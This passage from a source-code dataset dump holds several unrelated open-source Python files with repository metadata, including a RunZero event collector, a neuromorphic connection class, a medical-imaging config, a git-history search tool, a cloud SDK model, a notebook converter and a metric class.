forming_bonds=[(0, 1)], breaking_bonds=[(3, 4)]
)
translate_rotate_reactant(reactant, bond_rearr, shift_factor=1.5)
assert len(reactant.atoms) == 10
# The geometry should now be sensible
for i in range(1, 10):
assert reactant.distance(0, i) > 2.0
# Should be closer to the end carbon than the middle
assert reactant.distance(0, 1) < reactant.distance(0, 2)
|
9b6c2a8d9f3ee8e8563ff58d17361c4cf04e35fa
|
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
|
/Packs/RunZero/Integrations/RunZeroEventCollector/RunZeroEventCollector.py
|
cc3ef8a26c27c02a04d3bd09df8389011a1ee317
|
[
"MIT"
] |
permissive
|
demisto/content
|
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
|
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
|
refs/heads/master
| 2023-09-04T00:02:25.618032
| 2023-09-03T21:56:22
| 2023-09-03T21:56:22
| 60,525,392
| 1,023
| 1,921
|
MIT
| 2023-09-14T20:55:24
| 2016-06-06T12:17:02
|
Python
|
UTF-8
|
Python
| false
| false
| 9,685
|
py
|
RunZeroEventCollector.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import urllib3
from typing import Any, Dict, Tuple, List, Optional, cast
# Disable insecure warnings
urllib3.disable_warnings()
''' CONSTANTS '''
VENDOR = 'runzero'
PRODUCT = 'runzero'
DEFAULT_LIMIT = "1000"
''' CLIENT CLASS '''
class Client(BaseClient):
"""Client class to interact with the service API
This Client implements API calls, and does not contain any business logic.
Should only do requests and return data.
It inherits from BaseClient defined in CommonServer Python.
Most calls use _http_request() that handles proxy, SSL verification, etc.
"""
def __init__(self, base_url, verify, proxy, client_secret, client_id):
super().__init__(base_url=base_url, verify=verify, proxy=proxy)
data = {
'client_secret': client_secret,
'client_id': client_id,
'grant_type': 'client_credentials',
}
self.data = data
def get_api_token(self):
"""
Get api token for RunZero account API requests.
"""
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
try:
api_token_res = self._http_request(
method='POST',
url_suffix='/account/api/token',
headers=headers,
data=self.data,
)
except Exception as e:
if 'Forbidden' in str(e):
raise DemistoException('Authorization Error: make sure API Key is correctly set')
else:
raise e
return api_token_res.get('access_token', '')
def http_request(self, method: str, url_suffix: str, params: dict):
api_token = self.get_api_token()
headers = {
'Authorization': f'Bearer {api_token}'
}
return self._http_request(
method=method,
url_suffix=url_suffix,
params=params,
headers=headers,
)
def fetch_system_event_logs(self, search_query: str) -> list:
"""
Searches for RunZero system event logs using the '/account/events.json' API endpoint.
search_query parameter is passed directly to the API as HTTP POST parameter in the request
Args:
search_query (str): Query to search for. Using the created_at:>epoch_time to filter results.
Returns:
list: list of RunZero system event logs as dicts.
"""
request_params: Dict[str, str] = {"search": search_query}
return self.http_request(
method='GET',
url_suffix='/account/events.json',
params=request_params,
)
''' COMMAND FUNCTIONS '''
def test_module(client: Client, first_fetch_time: int) -> str:
"""
Tests API connectivity and authentication'
When 'ok' is returned it indicates the integration works like it is supposed to and connection to the service is
successful.
Raises exceptions if something goes wrong.
Args:
client (Client): RunZeroEventCollector client to use.
first_fetch_time (int): The first fetch time as configured in the integration params.
Returns:
str: 'ok' if test passed, anything else will raise an exception and will fail the test.
"""
fetch_events(
client=client,
max_results=1,
last_run={},
first_fetch_time=first_fetch_time
)
return 'ok'
def sort_events(events: list) -> list:
return sorted(events, key=lambda x: x['created_at'])
def get_events_command(
client: Client, query_string: str, limit: int
) -> Tuple[List[Dict[str, Any]], CommandResults]:
"""
Gets all the events from the RunZero API for each log type.
Args:
client (Client): RunZero client to use.
limit: int, the limit of the results to return per log_type.
Returns:
list: A list containing the events
CommandResults: A CommandResults object that contains the events in a table format.
"""
events: List[Dict] = []
hr = ''
temp_events = client.fetch_system_event_logs(query_string)
temp_events = sort_events(temp_events)
limited_events = temp_events[:limit]
if limited_events:
hr += tableToMarkdown(name='Events', t=limited_events)
for event in limited_events:
event = add_time_to_event(event)
events.append(event)
else:
hr = 'No events found.'
return events, CommandResults(readable_output=hr)
def add_time_to_event(event: dict):
event_created_time = int(event.get('created_at', '0'))
event_created_time_ms = event_created_time * 1000
event['_time'] = timestamp_to_datestring(event_created_time_ms)
return event
def fetch_events(client: Client, max_results: int, last_run: Dict[str, int],
first_fetch_time: Optional[int]) -> Tuple[Dict[str, int], List[dict]]:
"""
This function retrieves new alerts every interval (default is 1 minute).
It has to implement the logic of making sure that events are fetched only onces and no events are missed.
By default it's invoked by XSIAM every minute. It will use last_run to save the timestamp of the last event it
processed. If last_run is not provided, it should use the integration parameter first_fetch_time to determine when
to start fetching the first time.
Args:
client (Client): RunZero client to use.
max_results (int): Maximum numbers of events per fetch.
last_run (dict): A dict with a key containing the latest event created time we got from last fetch.
first_fetch_time(int): If last_run is None (first time we are fetching), it contains the timestamp in
milliseconds on when to start fetching events.
Returns:
dict: Next run dictionary containing the timestamp that will be used in ``last_run`` on the next fetch.
list: List of events that will be created in XSIAM.
"""
last_fetch = last_run.get('last_fetch', None)
if last_fetch is None:
last_fetch = first_fetch_time
else:
last_fetch = int(last_fetch)
latest_created_time = cast(int, last_fetch)
events: List[Dict[str, Any]] = []
search_query = f'created_at:>{latest_created_time}'
temp_events = client.fetch_system_event_logs(
search_query=search_query
)
temp_events = sort_events(events=temp_events)
limited_events = temp_events[:max_results]
for event in limited_events:
event_created_time = int(event.get('created_at', '0'))
if last_fetch:
if event_created_time <= last_fetch:
continue
events.append(add_time_to_event(event))
# Update last run and add event if the event is newer than last fetch
if event_created_time > latest_created_time:
latest_created_time = event_created_time
# Save the next_run as a dict with the last_fetch key to be stored
next_run = {'last_fetch': latest_created_time}
return next_run, events
''' MAIN FUNCTION '''
def main() -> None:
"""
main function, parses params and runs command functions
"""
params = demisto.params()
args = demisto.args()
command = demisto.command()
client_id = params.get('client_id', '')
client_secret = params.get('client_secret', {}).get('password', '')
base_url = urljoin(params.get('url'), '/api/v1.0')
verify_certificate = not params.get('insecure', False)
try:
first_fetch_time = arg_to_datetime(
arg=params.get('first_fetch', '3 days'),
arg_name='First fetch time',
required=True
)
first_fetch_epoch_time = int(first_fetch_time.timestamp()) if first_fetch_time else None # type: ignore
if not first_fetch_epoch_time:
raise DemistoException('Did not set first_fetch_time.')
proxy = params.get('proxy', False)
demisto.debug(f'Command being called is {command}')
client = Client(
base_url=base_url,
verify=verify_certificate,
proxy=proxy,
client_secret=client_secret,
client_id=client_id,
)
if command == 'test-module':
result = test_module(client, first_fetch_epoch_time)
return_results(result)
elif command == 'runzero-get-events':
events, results = get_events_command(
client, query_string=f'created_at:>{first_fetch_epoch_time}',
limit=arg_to_number(args.get("limit", DEFAULT_LIMIT)) # type: ignore
)
return_results(results)
if argToBoolean(args.get("should_push_events")):
send_events_to_xsiam(
events,
vendor=VENDOR,
product=PRODUCT
)
elif command == 'fetch-events':
max_results = arg_to_number(arg=params.get('max_fetch'))
next_run, events = fetch_events(
client=client,
max_results=max_results, # type: ignore
last_run=demisto.getLastRun(),
first_fetch_time=first_fetch_epoch_time
)
send_events_to_xsiam(
events,
vendor=VENDOR,
product=PRODUCT
)
demisto.setLastRun(next_run)
except Exception as e:
return_error(f'Failed to execute {command} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
|
1ad6f7b183881e5acb094aefa73363cd0267f892
|
3eb3c4046b17e265930aaf89fa93f41896f243cb
|
/spynnaker/pyNN/connections/ethernet_control_connection.py
|
6c5b6f0bbe57260280e8722cd841f041675d9469
|
[
"Apache-2.0"
] |
permissive
|
SpiNNakerManchester/sPyNNaker
|
b177613a114cfc7e7687ec36c1f72a2f07f66977
|
891cfb3046f66185fd8df52d270380fa94c32eab
|
refs/heads/master
| 2023-09-01T11:28:21.252266
| 2023-08-17T08:07:43
| 2023-08-17T08:07:43
| 20,801,613
| 101
| 53
|
Apache-2.0
| 2023-09-14T18:39:29
| 2014-06-13T11:07:19
|
Python
|
UTF-8
|
Python
| false
| false
| 2,632
|
py
|
ethernet_control_connection.py
|
# Copyright (c) 2017 The University of Manchester
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from spinn_front_end_common.utility_models import MultiCastCommand
from spinn_front_end_common.utilities.connections import LiveEventConnection
class EthernetControlConnection(LiveEventConnection):
"""
A connection that can translate Ethernet control messages received
from a Population.
"""
__slots__ = ["__translators"]
def __init__(
self, translator, label, live_packet_gather_label, local_host=None,
local_port=None):
"""
:param AbstractEthernetTranslator translator:
The translator of multicast to control commands
:param str label: The label of the vertex to attach the translator to
:param str live_packet_gather_label: The label of the LPG vertex that
this control connection will listen to.
:param str local_host: The optional host to listen on
:param int local_port: The optional port to listen on
"""
super().__init__(
live_packet_gather_label, receive_labels=[label],
local_host=local_host, local_port=local_port)
self.__translators = dict()
self.__translators[label] = translator
self.add_receive_callback(label, self._translate, translate_key=False)
def add_translator(self, label, translator):
"""
Add another translator that routes via the LPG.
:param str label: The label of the vertex to attach the translator to
:param AbstractEthernetTranslator translator:
The translator of multicast to control commands
"""
super().add_receive_label(label)
self.__translators[label] = translator
self.add_receive_callback(label, self._translate, translate_key=False)
def _translate(self, label, key, payload=None):
translator = self.__translators[label]
if payload is None:
translator.translate_control_packet(MultiCastCommand(key))
else:
translator.translate_control_packet(MultiCastCommand(key, payload))
|
fb24d9449f1efd9a2f9cc5e54817fb1c415f00ef
|
0559694cf652f496c8fc3a7827715e5fcf98e7b8
|
/InnerEye/ML/configs/segmentation/HeadAndNeckBase.py
|
602e82adff61f2d91ebd624f619a770de154a24c
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
microsoft/InnerEye-DeepLearning
|
9f7fc5f5dbeb153138d5668f1d026f24b68cb50f
|
2877002d50d3a34d80f647c18cb561025d9066cc
|
refs/heads/main
| 2023-08-24T16:52:52.817042
| 2023-03-23T09:36:07
| 2023-03-23T09:36:07
| 259,878,805
| 511
| 144
|
MIT
| 2023-07-26T18:55:26
| 2020-04-29T09:15:05
|
Python
|
UTF-8
|
Python
| false
| false
| 7,110
|
py
|
HeadAndNeckBase.py
|
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import random
from typing import Any, List, Optional
import pandas as pd
from InnerEye.Common.type_annotations import TupleInt3
from InnerEye.ML.config import MixtureLossComponent, PhotometricNormalizationMethod, SegmentationLoss, \
SegmentationModelBase, SliceExclusionRule, SummedProbabilityRule, equally_weighted_classes
from InnerEye.ML.deep_learning_config import OptimizerType
from InnerEye.ML.utils.model_metadata_util import generate_random_colours_list
from InnerEye.ML.utils.split_dataset import DatasetSplits
RANDOM_COLOUR_GENERATOR = random.Random(0)
class HeadAndNeckBase(SegmentationModelBase):
"""
Head and Neck radiotherapy image segmentation model.
This configuration needs to be supplied with a value for azure_dataset_id that refers to your
dataset. You may also supply a value for num_structures, feature_channels or any other feature. For example,
with the appropriate dataset, this would build the model whose results are reported in the `InnerEye team's
paper <https://pubmed.ncbi.nlm.nih.gov/33252691/>`_::
class HeadAndNeckPaper(HeadAndNeckBase):
def __init__(self):
super().__init__(
azure_dataset_id="foo_bar_baz",
num_structures=10
)
"""
def __init__(self,
ground_truth_ids: List[str],
ground_truth_ids_display_names: Optional[List[str]] = None,
colours: Optional[List[TupleInt3]] = None,
fill_holes: Optional[List[bool]] = None,
roi_interpreted_types: Optional[List[str]] = None,
class_weights: Optional[List[float]] = None,
slice_exclusion_rules: Optional[List[SliceExclusionRule]] = None,
summed_probability_rules: Optional[List[SummedProbabilityRule]] = None,
num_feature_channels: Optional[int] = None,
**kwargs: Any) -> None:
"""
Creates a new instance of the class.
:param ground_truth_ids: List of ground truth ids.
:param ground_truth_ids_display_names: Optional list of ground truth id display names. If
present then must be of the same length as ground_truth_ids.
:param colours: Optional list of colours. If
present then must be of the same length as ground_truth_ids.
:param fill_holes: Optional list of fill hole flags. If
present then must be of the same length as ground_truth_ids.
:param roi_interpreted_types: Optional list of roi_interpreted_types. If
present then must be of the same length as ground_truth_ids.
:param class_weights: Optional list of class weights. If
present then must be of the same length as ground_truth_ids + 1.
:param slice_exclusion_rules: Optional list of SliceExclusionRules.
:param summed_probability_rules: Optional list of SummedProbabilityRule.
:param num_feature_channels: Optional number of feature channels.
:param kwargs: Additional arguments that will be passed through to the SegmentationModelBase constructor.
"""
# Number of training epochs
num_epochs = 120
num_structures = len(ground_truth_ids)
colours = colours or generate_random_colours_list(RANDOM_COLOUR_GENERATOR, num_structures)
fill_holes = fill_holes or [True] * num_structures
roi_interpreted_types = roi_interpreted_types or ["ORGAN"] * num_structures
ground_truth_ids_display_names = ground_truth_ids_display_names or [f"zz_{x}" for x in ground_truth_ids]
# The amount of GPU memory required increases with both the number of structures and the
# number of feature channels. The following is a sensible default to avoid out-of-memory,
# but you can override is by passing in another (singleton list) value for feature_channels
# from a subclass.
num_feature_channels = num_feature_channels or (32 if num_structures <= 20 else 26)
bg_weight = 0.02 if len(ground_truth_ids) > 1 else 0.25
class_weights = class_weights or equally_weighted_classes(ground_truth_ids, background_weight=bg_weight)
# In case of vertical overlap between brainstem and spinal_cord, we separate them
# by converting brainstem voxels to cord, as the latter is clinically more sensitive.
# We do the same to separate SPC and MPC; in this case, the direction of change is unimportant,
# so we choose SPC-to-MPC arbitrarily.
slice_exclusion_rules = slice_exclusion_rules or []
summed_probability_rules = summed_probability_rules or []
super().__init__(
should_validate=False, # we'll validate after kwargs are added
num_epochs=num_epochs,
architecture="UNet3D",
kernel_size=3,
train_batch_size=1,
inference_batch_size=1,
feature_channels=[num_feature_channels],
crop_size=(96, 288, 288),
test_crop_size=(144, 512, 512),
inference_stride_size=(72, 256, 256),
image_channels=["ct"],
norm_method=PhotometricNormalizationMethod.CtWindow,
level=50,
window=600,
l_rate=1e-3,
min_l_rate=1e-5,
l_rate_polynomial_gamma=0.9,
optimizer_type=OptimizerType.Adam,
opt_eps=1e-4,
adam_betas=(0.9, 0.999),
momentum=0.9,
use_mixed_precision=True,
use_model_parallel=True,
monitoring_interval_seconds=0,
num_dataload_workers=2,
loss_type=SegmentationLoss.Mixture,
mixture_loss_components=[MixtureLossComponent(0.5, SegmentationLoss.Focal, 0.2),
MixtureLossComponent(0.5, SegmentationLoss.SoftDice, 0.1)],
ground_truth_ids=ground_truth_ids,
ground_truth_ids_display_names=ground_truth_ids_display_names,
largest_connected_component_foreground_classes=ground_truth_ids,
colours=colours,
fill_holes=fill_holes,
roi_interpreted_types=roi_interpreted_types,
class_weights=class_weights,
slice_exclusion_rules=slice_exclusion_rules,
summed_probability_rules=summed_probability_rules,
)
self.add_and_validate(kwargs)
def get_model_train_test_dataset_splits(self, dataset_df: pd.DataFrame) -> DatasetSplits:
return DatasetSplits.from_proportions(dataset_df, proportion_train=0.8, proportion_val=0.05,
proportion_test=0.15,
random_seed=0)
|
21996e441560da4c9ac68c707fb58a9b1bfa625b
|
4c54757b8c5293f5587210b2eafd7edfbf380446
|
/clouseau/clouseau.py
|
13204f3a573a25644ac6b7a2a3532af92f3709e2
|
[
"CC0-1.0"
] |
permissive
|
cfpb/clouseau
|
4d2815bddeaf3d8e17c399d0bf2bc47a7d4e3a30
|
d9a6672c214266f9eb819490c8b4ee3cffbe4538
|
refs/heads/master
| 2021-01-17T14:07:13.002619
| 2018-10-19T22:02:18
| 2018-10-19T22:02:18
| 8,520,426
| 101
| 25
|
NOASSERTION
| 2019-04-11T17:12:30
| 2013-03-02T12:50:55
|
Python
|
UTF-8
|
Python
| false
| false
| 5,879
|
py
|
clouseau.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Clouseau, a silly git repo inspector
#
#
import os
import argparse as arse
import pprint
import sys
import subprocess
from clients import *
from clients.colors import *
from parser import Parser
from commit_parser import CommitParser
from terms_collector import TermsCollector
from clouseau_model import ClouseauModel
VERSION='0.2.0'
class Clouseau:
"""
Wrap and delegate
"""
def __init__(self):
pass
def main(self , _args, client):
args = self.parse_args( _args )
collector = TermsCollector()
terms = collector.collect_terms( args['patterns'], args['term'] )
model = ClouseauModel(args['github_url'], terms)
# Clone repo
if(not args['skip']):
self.clone_repo( args['url'], args['repo_dir'] )
else:
print blue( 'Skipping git-clone or git-pull as --skip was found on the command line.' )
if args['revlist'] != None and args['revlist'] != 'all':
parser = CommitParser()
parser.parse(terms=terms, repo=args['repo_dir'], revlist=args['revlist'], clouseau_model=model, github_url=args['github_url'])
results = model.model
else:
parser = Parser()
results = parser.parse( terms=terms, repo=args['repo_dir'], revlist=args['revlist'] ,
before=args['before'], after=args['after'], author=args['author'], github_url=args['github_url'])
# pprint.pprint(results)
client.render( terms, results )
def clone_repo(self, url, destination):
try:
_out = subprocess.check_output(['git', 'clone', url, destination])
except subprocess.CalledProcessError:
print blue( "Directory, %s, exits. Trying git-pull instead of clone." % destination )
_out = subprocess.check_output(['git', '--git-dir=%s/.git' % destination, 'pull'])
print smoke( "Git says: %s" % _out )
return _out
except :
e = sys.exc_info()[0]
print red( 'Problem writing to destination: %s' % destination )
raise
return _out
# Belongs in console client
def parse_args( self, arguments ):
_dir = os.path.dirname(__file__)
_default_pattern_file = 'patterns/default.txt'
_pattern_path = os.path.join( _dir, _default_pattern_file )
_temp = os.path.join( _dir, "../temp")
p = arse.ArgumentParser (prog="clouseau", description=" Clouseau: A silly git inspector", version=VERSION)
p.add_argument('--url', '-u', required=True, action="store", dest="url",
help="The fully qualified git URL (http://www.kernel.org/pub/software/scm/git/docs/git-clone.html)")
p.add_argument('--term', '-t', required=False, action="store", dest="term",
help="Search for a single regular expression instead of every item in patterns/default.txt"),
p.add_argument('--patterns', '-p', action="store", dest="patterns", default=_pattern_path,
help="File path to a list of regular expressions to use. Can be a comma-separated list of files. See patterns/default.txt")
p.add_argument('--clean', '-c', dest="clean", action="store_true", default=False,
help="Delete the existing git repo and re-clone")
p.add_argument('--output', '-o', dest="output_format", required=False,
help="Output formats: console, markdown, raw, html, json, csv. Default: console.")
p.add_argument('--output-destination', '-od', dest="output_destination", required=False, default=_temp,
help="Location where the output is to be stored. Default clouseau/temp.")
p.add_argument('--dest', '-d', dest="dest", default=_temp,
help="The directory where the git repo is to be stored. Default: clouseau/temp")
p.add_argument('--revlist', '-rl', required=False, dest="revlist",
help="A space-delimted list of revisions (commits) to search. Defaults to HEAD. Specify 'all'" \
" to search the entire history.")
p.add_argument('--before', '-b', dest='before', required=False,
help="Search commits that occur prior to this date; e.g., Mar-08-2013")
p.add_argument('--after', '-a', dest="after", required=False,
help="Search commits that occur after this date; e.g., Mar-10-2013")
p.add_argument('--author', dest="author", required=False,
help="Perform searched for commits made by AUTHOR. An email address is fine.")
p.add_argument('--skip', '-s', dest="skip", action="store_true",
help="If specified, skips any calls to git-clone or git-pull. Useful in combination with --dest to test a local git repo")
args = p.parse_args( arguments )
url = args.url.rstrip('/')
github_url = url.rstrip('.git')
repo = url.rsplit('/',1)[1]
repo_name = repo.rstrip('.git')
self.args = args
return { "url": url,
"github_url": github_url ,
"repo": repo,
"repo_name": repo_name,
"repo_dir": ("%s/%s" % (args.dest,repo_name) ),
"clean": args.clean,
"output_format": args.output_format,
"dest": args.dest,
"patterns": args.patterns,
"revlist": args.revlist,
"term": args.term,
"before": args.before,
"after": args.after,
"author": args.author,
"skip": args.skip
}
|
d9778de9ea28564943c8b0600510d8967cf6e52d
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-css/huaweicloudsdkcss/v1/model/cluster_list_instances.py
|
a91df665dbfb5704f4c1f3526c1f501d97eb476b
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 8,326
|
py
|
cluster_list_instances.py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ClusterListInstances:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'status': 'str',
'type': 'str',
'id': 'str',
'name': 'str',
'spec_code': 'str',
'az_code': 'str',
'ip': 'str',
'volume': 'ClusterVolumeRsp'
}
attribute_map = {
'status': 'status',
'type': 'type',
'id': 'id',
'name': 'name',
'spec_code': 'specCode',
'az_code': 'azCode',
'ip': 'ip',
'volume': 'volume'
}
def __init__(self, status=None, type=None, id=None, name=None, spec_code=None, az_code=None, ip=None, volume=None):
"""ClusterListInstances
The model defined in huaweicloud sdk
:param status: 节点状态值。 - 100:创建中。 - 200:可用。 - 303:不可用,如创建失败。
:type status: str
:param type: 当前节点的类型。
:type type: str
:param id: 实例ID。
:type id: str
:param name: 实例名字。
:type name: str
:param spec_code: 节点规格名称。
:type spec_code: str
:param az_code: 节点所属AZ信息。
:type az_code: str
:param ip: 实例ip信息。
:type ip: str
:param volume:
:type volume: :class:`huaweicloudsdkcss.v1.ClusterVolumeRsp`
"""
self._status = None
self._type = None
self._id = None
self._name = None
self._spec_code = None
self._az_code = None
self._ip = None
self._volume = None
self.discriminator = None
if status is not None:
self.status = status
if type is not None:
self.type = type
if id is not None:
self.id = id
if name is not None:
self.name = name
if spec_code is not None:
self.spec_code = spec_code
if az_code is not None:
self.az_code = az_code
if ip is not None:
self.ip = ip
if volume is not None:
self.volume = volume
@property
def status(self):
"""Gets the status of this ClusterListInstances.
节点状态值。 - 100:创建中。 - 200:可用。 - 303:不可用,如创建失败。
:return: The status of this ClusterListInstances.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this ClusterListInstances.
节点状态值。 - 100:创建中。 - 200:可用。 - 303:不可用,如创建失败。
:param status: The status of this ClusterListInstances.
:type status: str
"""
self._status = status
@property
def type(self):
"""Gets the type of this ClusterListInstances.
当前节点的类型。
:return: The type of this ClusterListInstances.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ClusterListInstances.
当前节点的类型。
:param type: The type of this ClusterListInstances.
:type type: str
"""
self._type = type
@property
def id(self):
"""Gets the id of this ClusterListInstances.
实例ID。
:return: The id of this ClusterListInstances.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ClusterListInstances.
实例ID。
:param id: The id of this ClusterListInstances.
:type id: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this ClusterListInstances.
实例名字。
:return: The name of this ClusterListInstances.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ClusterListInstances.
实例名字。
:param name: The name of this ClusterListInstances.
:type name: str
"""
self._name = name
@property
def spec_code(self):
"""Gets the spec_code of this ClusterListInstances.
节点规格名称。
:return: The spec_code of this ClusterListInstances.
:rtype: str
"""
return self._spec_code
@spec_code.setter
def spec_code(self, spec_code):
"""Sets the spec_code of this ClusterListInstances.
节点规格名称。
:param spec_code: The spec_code of this ClusterListInstances.
:type spec_code: str
"""
self._spec_code = spec_code
@property
def az_code(self):
"""Gets the az_code of this ClusterListInstances.
节点所属AZ信息。
:return: The az_code of this ClusterListInstances.
:rtype: str
"""
return self._az_code
@az_code.setter
def az_code(self, az_code):
"""Sets the az_code of this ClusterListInstances.
节点所属AZ信息。
:param az_code: The az_code of this ClusterListInstances.
:type az_code: str
"""
self._az_code = az_code
@property
def ip(self):
"""Gets the ip of this ClusterListInstances.
实例ip信息。
:return: The ip of this ClusterListInstances.
:rtype: str
"""
return self._ip
@ip.setter
def ip(self, ip):
"""Sets the ip of this ClusterListInstances.
实例ip信息。
:param ip: The ip of this ClusterListInstances.
:type ip: str
"""
self._ip = ip
@property
def volume(self):
"""Gets the volume of this ClusterListInstances.
:return: The volume of this ClusterListInstances.
:rtype: :class:`huaweicloudsdkcss.v1.ClusterVolumeRsp`
"""
return self._volume
@volume.setter
def volume(self, volume):
"""Sets the volume of this ClusterListInstances.
:param volume: The volume of this ClusterListInstances.
:type volume: :class:`huaweicloudsdkcss.v1.ClusterVolumeRsp`
"""
self._volume = volume
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ClusterListInstances):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
116741285118653273b05b04f508de81a2b7b399
|
2a83fcc6c0ba53ac48d6678cc02362795e36e82f
|
/nbformat/converter.py
|
4d71e5e5cd84d354ee05b5744a570b80583fc47e
|
[
"BSD-3-Clause"
] |
permissive
|
jupyter/nbformat
|
e0caf0e50429024620661ccb88fc95891e56eeb9
|
a3e787dccbf629c8cbae46f79e74d53ded8b53a9
|
refs/heads/main
| 2023-09-01T07:52:52.509860
| 2023-08-01T09:58:00
| 2023-08-01T09:58:00
| 33,640,907
| 237
| 161
|
BSD-3-Clause
| 2023-09-14T14:33:16
| 2015-04-09T01:07:29
|
Python
|
UTF-8
|
Python
| false
| false
| 2,608
|
py
|
converter.py
|
"""API for converting notebooks between versions."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from . import versions
from .reader import get_version
from .validator import ValidationError
def convert(nb, to_version):
"""Convert a notebook node object to a specific version. Assumes that
all the versions starting from 1 to the latest major X are implemented.
In other words, there should never be a case where v1 v2 v3 v5 exist without
a v4. Also assumes that all conversions can be made in one step increments
between major versions and ignores minor revisions.
Parameters
----------
nb : NotebookNode
to_version : int
Major revision to convert the notebook to. Can either be an upgrade or
a downgrade.
Raises
------
ValueError
Notebook failed to convert.
ValueError
The version specified is invalid or doesn't exist.
ValidationError
Conversion failed due to missing expected attributes.
"""
# Get input notebook version.
(version, version_minor) = get_version(nb)
# Check if destination is target version, if so return contents
if version == to_version:
return nb
# If the version exist, try to convert to it one step at a time.
elif to_version in versions:
# Get the the version that this recursion will convert to as a step
# closer to the final revision. Make sure the newer of the conversion
# functions is used to perform the conversion.
if to_version > version:
step_version = version + 1
convert_function = versions[step_version].upgrade
else:
step_version = version - 1
convert_function = versions[version].downgrade
try:
# Convert and make sure version changed during conversion.
converted = convert_function(nb)
if converted.get("nbformat", 1) == version:
msg = "Failed to convert notebook from v%d to v%d." % (version, step_version)
raise ValueError(msg)
except AttributeError as e:
msg = f"Notebook could not be converted from version {version} to version {step_version} because it's missing a key: {e}"
raise ValidationError(msg) from None
# Recursively convert until target version is reached.
return convert(converted, to_version)
else:
raise ValueError(
"Cannot convert notebook to v%d because that version doesn't exist" % (to_version)
)
|
f57398fcefedb5358448a38e7c89f36e8f03e22c
|
ee327d13a6e71dd43412ab89092cf3ff5fceb132
|
/larq/metrics.py
|
a6d9417f04177a96f661cba1c4ba6340b1489acd
|
[
"Apache-2.0"
] |
permissive
|
larq/larq
|
4150c22922efc498831d04f8a316372d30dd6348
|
5dc58e4f49c1b51554db822b87e6bf947031b990
|
refs/heads/main
| 2023-08-31T01:53:41.348448
| 2023-08-21T09:05:41
| 2023-08-21T09:05:41
| 176,374,098
| 615
| 76
|
Apache-2.0
| 2023-09-11T18:07:34
| 2019-03-18T21:41:50
|
Python
|
UTF-8
|
Python
| false
| false
| 3,341
|
py
|
metrics.py
|
"""We add metrics specific to extremely quantized networks using a
`larq.context.metrics_scope` rather than through the `metrics` parameter of
`model.compile()`, where most common metrics reside. This is because, to calculate
metrics like the `flip_ratio`, we need a layer's kernel or activation and not just the
`y_true` and `y_pred` that Keras passes to metrics defined in the usual way.
"""
import numpy as np
import tensorflow as tf
from larq import utils
@utils.register_alias("flip_ratio")
@utils.register_keras_custom_object
class FlipRatio(tf.keras.metrics.Metric):
"""Computes the mean ratio of changed values in a given tensor.
!!! example
```python
m = metrics.FlipRatio()
m.update_state((1, 1)) # result: 0
m.update_state((2, 2)) # result: 1
m.update_state((1, 2)) # result: 0.75
print('Final result: ', m.result().numpy()) # Final result: 0.75
```
# Arguments
name: Name of the metric.
values_dtype: Data type of the tensor for which to track changes.
dtype: Data type of the moving mean.
"""
def __init__(self, values_dtype="int8", name="flip_ratio", dtype=None):
super().__init__(name=name, dtype=dtype)
self.built = False
self.values_dtype = tf.as_dtype(values_dtype)
def build(self, input_shape):
self._previous_values = self.add_weight(
"previous_values",
shape=input_shape,
dtype=self.values_dtype,
initializer=tf.keras.initializers.zeros,
aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA,
)
self.total = self.add_weight(
